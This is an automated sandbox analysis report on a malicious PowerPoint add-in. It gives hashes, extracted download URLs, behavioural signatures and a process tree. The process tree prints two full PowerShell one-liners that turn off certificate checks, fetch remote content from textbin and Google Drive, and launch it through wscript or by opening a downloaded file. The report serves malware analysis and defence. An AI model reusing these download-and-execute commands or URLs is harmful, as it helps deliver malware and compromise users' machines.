Analysis
-
max time kernel
133s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
26-11-2024 16:05
Static task
static1
Behavioral task
behavioral1
Sample
3863c533a821c836f236edf3d35a278ccf7d00ec1b5087cb662e8aa7ddb7e54f.ppam
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
3863c533a821c836f236edf3d35a278ccf7d00ec1b5087cb662e8aa7ddb7e54f.ppam
Resource
win10v2004-20241007-en
General
-
Target
3863c533a821c836f236edf3d35a278ccf7d00ec1b5087cb662e8aa7ddb7e54f.ppam
-
Size
7KB
-
MD5
9fb59ca8e5dbe7036ad7bd3e0d64dc46
-
SHA1
e63989b5046883141c1b5c80ed9dfe12f5146531
-
SHA256
3863c533a821c836f236edf3d35a278ccf7d00ec1b5087cb662e8aa7ddb7e54f
-
SHA512
8ec8ac5cad6a52bc6f11d56f1f276cb187edcdcf90c65cac28b8610549f54b193e957448b5633d0babb06b654c8e35508fb98ed9aaaf37f2ccb06d3600ae4d27
-
SSDEEP
192:xrXP/xbajZ8EPm/QUN0iIZU0pU3pWBg6HoqBT02:dXP4ruWnK3pWWsLBT7
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=15ocCLsR2ZmidPwSBKFMdpMbEhO5YtYQ4
Extracted
https://pt.textbin.net/download/x7sf6t2dgv
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 5100 3252 powershell.exe 82 Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 4672 3252 powershell.exe 82 -
Blocklisted process makes network request 3 IoCs
flow pid Process 6 5100 powershell.exe 7 4672 powershell.exe 11 5100 powershell.exe -
pid Process 5100 powershell.exe 4672 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 4 drive.google.com 6 drive.google.com -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString POWERPNT.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU POWERPNT.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS POWERPNT.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3252 POWERPNT.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 5100 powershell.exe 4672 powershell.exe 5100 powershell.exe 4672 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 5100 powershell.exe Token: SeDebugPrivilege 4672 powershell.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 3252 POWERPNT.EXE 3252 POWERPNT.EXE 3252 POWERPNT.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 3252 wrote to memory of 4672 3252 POWERPNT.EXE 84 PID 3252 wrote to memory of 4672 3252 POWERPNT.EXE 84 PID 3252 wrote to memory of 5100 3252 POWERPNT.EXE 85 PID 3252 wrote to memory of 5100 3252 POWERPNT.EXE 85 PID 4672 wrote to memory of 3996 4672 powershell.exe 88 PID 4672 wrote to memory of 3996 4672 powershell.exe 88 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\3863c533a821c836f236edf3d35a278ccf7d00ec1b5087cb662e8aa7ddb7e54f.ppam" /ou ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3252 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command $UmniN;[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$uNTnd = (New-Object Net.WebClient) ;$uNTnd.Encoding = [System.Text.Encoding]::UTF8 ;$UmniN = $uNTnd.DownloadString( 'https://pt.textbin.net/download/x7sf6t2dgv' ) ;$uNTnd = $uNTnd.DownloadString( $UmniN ) ;$x = [System.IO.Path]::GetTempPath() ;Set-Location $x ;$uNTnd | Out-File -FilePath x.js -force ;wscript.exe x.js ; exit2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4672 -
C:\Windows\system32\wscript.exe"C:\Windows\system32\wscript.exe" x.js3⤵PID:3996
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$uNTnd = (New-Object Net.WebClient) ;$uNTnd.Encoding = [System.Text.Encoding]::UTF8 ;$uNTnd.DownloadFile( 'https://drive.google.com/uc?export=download&id=15ocCLsR2ZmidPwSBKFMdpMbEhO5YtYQ4', [System.IO.Path]::GetTempPath() + 'x.pptx' ) ;$x = [System.IO.Path]::GetTempPath() ;Set-Location $x ;start x.pptx ; exit2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5100
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
1KB
MD551aa87521f685fa8d4f4bdbd7684a350
SHA1fd4027d9b24c41461525b0f3f764aa6b2ddd5803
SHA2566e9453d9cff64f88f0a0b0b5cda807f7deac354120724137e7426871401ea0d6
SHA512637f0b4c94abb0bcf0bbf21ec2d328eccbf1bd6a37c5dbd309cd428f5aaab08d0f6102a8f45c09372fba57c034fc88ed7950c9afe366583cd5f636ee0b974947
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD5445d124223ce3f0e08a0ae4058c43785
SHA1f86d49541baa26af050371595a0ae86eeb1a9944
SHA256e7aaad63724fe31051a2321cdb30e760bbfabb4f6cc2606a41fa1c18719ce87b
SHA51207bd5136ea8d1f1933ed3b96fa724ad65a70a0cf74f2162cff9d3689d5facee84e081036ac71eacf3569c8dfb53c103acedcca0f11f7914630494edbb371ce13